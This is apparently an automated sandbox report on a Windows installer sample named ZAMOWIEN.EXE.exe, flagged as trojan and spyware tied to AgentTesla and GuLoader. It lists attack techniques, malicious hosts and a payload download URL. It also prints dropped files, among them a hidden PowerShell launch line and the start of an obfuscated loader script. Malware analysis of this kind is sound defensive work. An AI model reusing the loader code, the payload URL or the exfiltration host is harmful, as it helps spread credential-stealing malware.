              Employee NamesVirtual Private ServerLocal Accounts1
              PowerShell
              Login HookLogin Hook11
              Masquerading
              NTDS1
              Process Discovery
              Distributed Component Object Model1
              Clipboard Data
              2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script131
              Virtualization/Sandbox Evasion
              LSA Secrets131
              Virtualization/Sandbox Evasion
              SSHKeylogging23
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
              Process Injection
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              ZAMOWIEN.EXE.exe11%ReversingLabs
              ZAMOWIEN.EXE.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://nsis.sf.net/NSIS_Error0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              corella.ro
              109.73.128.91
              truefalse
                unknown
                ftp.rusticpensiune.ro
                185.146.87.128
                truetrue
                  unknown
                  www.corella.ro
                  unknown
                  unknownfalse
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://www.corella.ro/bazyland/whwWkpNOyoMrBlLiWEjvE44.binfalse
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1678420817.0000000006119000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.corella.ro/bazyland/whwWkpNOyoMrBlLiWEjvE44.binRefosWelwww.creditesimplebm.ro/tmp-image/msiexec.exe, 0000000C.00000002.2517656375.00000000073D0000.00000004.00001000.00020000.00000000.sdmpfalse
                        unknown
                        http://nsis.sf.net/NSIS_ErrorZAMOWIEN.EXE.exefalse
                        • URL Reputation: safe
                        unknown
                        http://crl.micropowershell.exe, 00000002.00000002.1680629547.00000000077D4000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1676066608.0000000005205000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1674975257.00000000030AF000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1676066608.00000000050B1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://www.corella.ro/msiexec.exe, 0000000C.00000002.2511505619.00000000006F2000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            https://www.corella.ro/bazyland/whwWkpNOyoMrBlLiWEjvE44.bin=msiexec.exe, 0000000C.00000002.2511505619.00000000006F2000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1676066608.0000000005205000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1674975257.00000000030AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://contoso.com/powershell.exe, 00000002.00000002.1678420817.0000000006119000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1678420817.0000000006119000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://contoso.com/Licensepowershell.exe, 00000002.00000002.1678420817.0000000006119000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://contoso.com/Iconpowershell.exe, 00000002.00000002.1678420817.0000000006119000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://nsis.sf.net/NSIS_ErrorErrorZAMOWIEN.EXE.exefalse
                                • URL Reputation: safe
                                unknown
                                http://ftp.rusticpensiune.romsiexec.exe, 0000000C.00000002.2530421753.0000000022D35000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2530421753.0000000022D27000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1676066608.00000000050B1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000C.00000002.2530421753.0000000022D27000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1676066608.0000000005205000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1674975257.00000000030AF000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    109.73.128.91
                                    corella.roSpain
                                    49674DJEMBA-ASROfalse
                                    185.146.87.128
                                    ftp.rusticpensiune.roRomania
                                    5588GTSCEGTSCentralEuropeAntelGermanyCZtrue
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1527749
                                    Start date and time:2024-10-07 09:28:48 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 3s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:18
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:ZAMOWIEN.EXE.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@17/10@2/2
                                    EGA Information:
                                    • Successful, ratio: 33.3%
                                    HCA Information:
                                    • Successful, ratio: 94%
                                    • Number of executed functions: 125
                                    • Number of non-executed functions: 28
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target msiexec.exe, PID 7660 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 5896 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: ZAMOWIEN.EXE.exe
                                    TimeTypeDescription
                                    03:29:43API Interceptor41x Sleep call for process: powershell.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    109.73.128.9124100311.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                      185.146.87.12824100311.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        LisectAVT_2403002A_35.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                          COMANDA_AXM_NR17_DIN_240717.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                            ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                              ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                  BESTELLU.EXE.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                    Ordine_nr.24061168372.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                      ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                        ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          ftp.rusticpensiune.ro24100311.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 185.146.87.128
                                                          LisectAVT_2403002A_35.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                          • 185.146.87.128
                                                          COMANDA_AXM_NR17_DIN_240717.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                          • 185.146.87.128
                                                          ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                          • 185.146.87.128
                                                          ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                          • 185.146.87.128
                                                          ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                          • 185.146.87.128
                                                          BESTELLU.EXE.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                          • 185.146.87.128
                                                          Ordine_nr.24061168372.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                          • 185.146.87.128
                                                          ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                                          • 185.146.87.128
                                                          ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                          • 185.146.87.128
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          GTSCEGTSCentralEuropeAntelGermanyCZg 288322.vbsGet hashmaliciousGuLoaderBrowse
                                                          • 188.241.183.45
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                          • 94.42.225.83
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                          • 62.168.37.193
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                          • 94.42.225.84
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                          • 94.42.225.74
                                                          arm-20241006-0950.elfGet hashmaliciousMiraiBrowse
                                                          • 212.38.198.232
                                                          6BTZGMvUv1.elfGet hashmaliciousUnknownBrowse
                                                          • 89.174.107.71
                                                          24100311.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 185.146.87.128
                                                          novo.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 85.9.53.119
                                                          https://en.softonic.comGet hashmaliciousUnknownBrowse
                                                          • 62.209.227.210
                                                          DJEMBA-ASRO24100311.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 109.73.128.91
                                                          fxCP7I6KhH.elfGet hashmaliciousMiraiBrowse
                                                          • 86.106.83.78
                                                          2AoPFpxIKS.elfGet hashmaliciousMiraiBrowse
                                                          • 86.106.83.74
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          37f463bf4616ecd445d4a1937da06e190urFbKxdvL.exeGet hashmaliciousUnknownBrowse
                                                          • 109.73.128.91
                                                          zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                          • 109.73.128.91
                                                          file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                                                          • 109.73.128.91
                                                          setup_installer.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                          • 109.73.128.91
                                                          file.dllGet hashmaliciousMatanbuchusBrowse
                                                          • 109.73.128.91
                                                          file.dllGet hashmaliciousMatanbuchusBrowse
                                                          • 109.73.128.91
                                                          zR4aIjCuRs.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          • 109.73.128.91
                                                          buildz.exeGet hashmaliciousBabuk, DjvuBrowse
                                                          • 109.73.128.91
                                                          InstallSetup.exeGet hashmaliciousStealcBrowse
                                                          • 109.73.128.91
                                                          Narudzba ACH0036173.vbeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 109.73.128.91
                                                          No context
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:modified
                                                          Size (bytes):14744
                                                          Entropy (8bit):4.992175361088568
                                                          Encrypted:false
                                                          SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                          MD5:A35685B2B980F4BD3C6FD278EA661412
                                                          SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                          SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                          SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                          Process:C:\Users\user\Desktop\ZAMOWIEN.EXE.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):229
                                                          Entropy (8bit):5.254953762591741
                                                          Encrypted:false
                                                          SSDEEP:6:HH9vtx3eIx90FuCmRAue0i23f1CuaZGHCn8MLVk+WL/9uZMLVkTW:HPBeDGmeZ9CLL1WrfLWW
                                                          MD5:86DEE2D55D3BE02304A44DAED72C2314
                                                          SHA1:28EB08CAEE720462459CE1C58C96773E858F6518
                                                          SHA-256:34009FA385212C3021FB93ED41928217DAA93DF0814ADDDBD55F599B479AA615
                                                          SHA-512:C2BE75AF0E4031CCD18EC1EE3A18E9112A03F82AFB7766C6A63332058ED2ADEED2B6CC540C04A5DBBECE91A06C454859A80C3805D3542CD2248C0FF707C28397
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:[Ini App]..Load=-windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)" ..
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Reputation:high, very likely benign file
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):60
                                                          Entropy (8bit):4.038920595031593
                                                          Encrypted:false
                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                          Malicious:false
                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                          Process:C:\Users\user\Desktop\ZAMOWIEN.EXE.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):320
                                                          Entropy (8bit):4.34670995732008
                                                          Encrypted:false
                                                          SSDEEP:6:Fg+ZcFCGTQXMRKKRc7fMMRM19eoASDAOAwqxsIe2eN5L3AdrXXDMLQ+:yQGTQcrC7UQK9erXwQpzeXwlXwN
                                                          MD5:0F8645402BA085E744E4A9D6EED52A9D
                                                          SHA1:02362FB57390E3F9A9B39C44AA35FEE313636797
                                                          SHA-256:E0B733763ED72C647150186F894BD8E531E9D00903CCF490E48AE8B824C44C9F
                                                          SHA-512:612496E5DF56D3D34A24420B98163CDA4E2729CEE5EC2CCAF607FE02013646902F0BE4297E7ADFE1E6BB8FCB86F5C48C271460AF7D0455619867EBCC4BDC35C8
                                                          Malicious:false
                                                          Preview:usufructuary phosphation made.incestuse catelectrotonic uoplystes imperturbed toothier rutebil.sundhedspolitiks traductive whincheck,poltinnik kamuflagemalet wordster kkkengrejernes,mirrorizes begnawed conchotome appreter lamentory stampsmen saccharoidal nadijas..eftersommer gomutis orchidocele commendableness pretrim,
                                                          Process:C:\Users\user\Desktop\ZAMOWIEN.EXE.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):40072
                                                          Entropy (8bit):1.2574713490480631
                                                          Encrypted:false
                                                          SSDEEP:384:QYikXAGnG39O7V+SaMlIfme35eqrJbVBnm0NeBP:3nX7ws+rf7xVpm0NeN
                                                          MD5:2AB81ADF9BEA2D1BBCEF5EB95EC9E741
                                                          SHA1:96CA2DFA7FBDD2A4B8D014CCB40584D8F1FA0EAA
                                                          SHA-256:F904A63CACD406F9263A08BE7BAD027BCBFC83BE56752F87F63E568877511826
                                                          SHA-512:CE0FA7CA2957CA7632E5042C9D04CC9D371D783596593105BC47835A02331CC68E9872BA1DD11D1535CE840B9D01FF5CEF1EF5DC3B035A9267EC380F434B1142
                                                          Malicious:false
                                                          Preview:...................i...........................l......................t.....z..........................................................................................E...j................-...........,.G...................................$....H..o....2............8............................Z.....................................*........................6.............s.Z.........................z............................................B........................................... ..........................................................................................................................o...H.................4..............................o..............................................................................F..h...../....................................................r...........L.......:......................................................................................................................1.......(................................................
                                                          Process:C:\Users\user\Desktop\ZAMOWIEN.EXE.exe
                                                          File Type:ASCII text, with very long lines (3071), with CRLF, LF line terminators
                                                          Category:dropped
                                                          Size (bytes):53183
                                                          Entropy (8bit):5.338730327033852
                                                          Encrypted:false
                                                          SSDEEP:1536:8OVz0fE7uE4vtvko03n0rytHgbzgj0nboBKC480B1gRf:zznQkDEyNcE0MBKCO1mf
                                                          MD5:C7B38EB59906350C5320FBA41407D4A7
                                                          SHA1:2C6B4EDA941D4F23D1D5969FC7CF06E689450DE8
                                                          SHA-256:445C94FA7B8C3F9A7A84BC797FF21109431E9FE512B58D5B4E63581138CB0E61
                                                          SHA-512:F3C52188A2C107F1011AE156BD94C8D2465C1D767A166049B374F1BEC023F0B123B185F280A5E3B8787BCA065AE69EA8A2945EB68E88BE778C202824D670BC19
                                                          Malicious:false
                                                          Preview:$Glucofrangulin=$Thorning;..<#Boligform Sdebadet Boformen Imaginrdelenes Soeren Belssedes #>..<#Unscoured rodebutikkers Witherweight Kaninerne Regelfaststtelsen Regerende Trampolinspring #>..<#Udspecialiseringens Europamesters Inddmningernes #>..<#Udladeres Payableness Sylfiders Bvens Ambitis Jgerkorpsets Centimetermaalets #>..<#Patentability Skaansommeres Echoized #>..<#Disobligingness Nervepatienterne Underminerings #>...$Crocketing = @'.Slowm.Atol,$SprogPOsmotr nreoKor sdGldsfuPrioncJor feudvalrMagnos,odtihS yggiEu yhpRyked=Susta$HemauiSennenValndtErf reBest nFathesoverpi ,ncatVinyle B tatSkbn eInddanChlorsPrealiBirthe mtsbnPum,evMuc seResi,nMonoluArres;Sh.ka. steof G.apuNeg.en SporcRepertAttaiisurp o ,rchn,eyde phasiUfrog.nForsig MelolricipaSarb d Modvs Lungo .uppmPrammeTungm Indda(Menin$.ikkeFSterieLyd gdRefintLudbeeOxyurr.aseiaOvervdWissisLresteVarsot,lashs Aca.,Mytac$Vis oiOpk,lnRen stNa,ure votn Bib.s Mismi BractPldereTaifutAmuleeFaxfrnP.kets C lo)Ben t Eksem{ Pter.Volte.Hand
                                                          Process:C:\Users\user\Desktop\ZAMOWIEN.EXE.exe
                                                          File Type:ISO-8859 text, with very long lines (65536), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):393439
                                                          Entropy (8bit):6.672016070513227
                                                          Encrypted:false
                                                          SSDEEP:6144:QTiok9j+NGfgt2PNpP/iAb6WpT5bWsP8gCkoi/cmPZCzouP:QTiopGfgsq0Z5YgFRcmPZy/P
                                                          MD5:439B3BA82D1F3DD320C6ECF23D6E82EC
                                                          SHA1:92DED62319CB63936285FBC9A02FA650B45F5392
                                                          SHA-256:1CC1F16263CB1FF8E2A7480A2DCC7A747BBBA5047EA2E44618E403DA774ABD35
                                                          SHA-512:622952338704BA9C4598F21662572902074F9F44E67399BE77A75CF51AED771D3EB576A258151787A74EF30DFAF3001A9C04BEC205FBE5AABA5F5B5C770F83EC
                                                          Malicious:false
                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                          Entropy (8bit):7.85318447280769
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 92.16%
                                                          • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:ZAMOWIEN.EXE.exe
                                                          File size:456'011 bytes
                                                          MD5:6b63bdc24b2e1162073514f7934a4f9c
                                                          SHA1:c879e7e6aae7427d076acb33b55acb788aecddf7
                                                          SHA256:4842cfe7f5fc8b3bcc22b0049e03edc16393e06ea5e486cb5e9ddbe7a21cd624
                                                          SHA512:dae2cd4f41b7be76f97b1b7238819e019fba7a14eccb5768abe1d180eb0e28f933bd9b5a9fa52abc0119539703f5e453b70e01037d9a55fce9bf101b0df911b9
                                                          SSDEEP:6144:NqC56ALcmpQFbVySc2pxkYihgnHcbS48a782EYCLrQjEBtMWc/+TxYyA:KA9WL5c2pEh2gV8axE1wlWmcYyA
                                                          TLSH:07A42312AAC2D1FFEFE30971856AE372E736BE601641499B0B44FD7729D41630B168CA
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<`..x...x...x.......z...x...........i...,"..t.......y...Richx...........................PE..L...v..Q.................\....9....
                                                          Icon Hash:415d24c468697907
                                                          Entrypoint:0x4030ef
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x51E30576 [Sun Jul 14 20:09:26 2013 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:b40f29cd171eb54c01b1dd2683c9c26b
                                                          Instruction
                                                          sub esp, 00000184h
                                                          push ebx
                                                          push ebp
                                                          push esi
                                                          xor ebx, ebx
                                                          push edi
                                                          mov dword ptr [esp+18h], ebx
                                                          mov dword ptr [esp+10h], 00409190h
                                                          mov dword ptr [esp+20h], ebx
                                                          mov byte ptr [esp+14h], 00000020h
                                                          call dword ptr [00407034h]
                                                          push 00008001h
                                                          call dword ptr [004070B0h]
                                                          push ebx
                                                          call dword ptr [0040728Ch]
                                                          push 00000008h
                                                          mov dword ptr [007A27B8h], eax
                                                          call 00007FB158B8AF28h
                                                          mov dword ptr [007A2704h], eax
                                                          push ebx
                                                          lea eax, dword ptr [esp+38h]
                                                          push 00000160h
                                                          push eax
                                                          push ebx
                                                          push 0079DCB8h
                                                          call dword ptr [00407164h]
                                                          push 00409180h
                                                          push 007A1F00h
                                                          call 00007FB158B8ABD2h
                                                          call dword ptr [0040711Ch]
                                                          mov ebp, 007A8000h
                                                          push eax
                                                          push ebp
                                                          call 00007FB158B8ABC0h
                                                          push ebx
                                                          call dword ptr [00407114h]
                                                          cmp byte ptr [007A8000h], 00000022h
                                                          mov dword ptr [007A2700h], eax
                                                          mov eax, ebp
                                                          jne 00007FB158B881BCh
                                                          mov byte ptr [esp+14h], 00000022h
                                                          mov eax, 007A8001h
                                                          push dword ptr [esp+14h]
                                                          push eax
                                                          call 00007FB158B8A66Dh
                                                          push eax
                                                          call dword ptr [00407220h]
                                                          mov dword ptr [esp+1Ch], eax
                                                          jmp 00007FB158B88275h
                                                          cmp cl, 00000020h
                                                          jne 00007FB158B881B8h
                                                          inc eax
                                                          cmp byte ptr [eax], 00000020h
                                                          je 00007FB158B881ACh
                                                          Programming Language:
                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b30000x1bf20.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
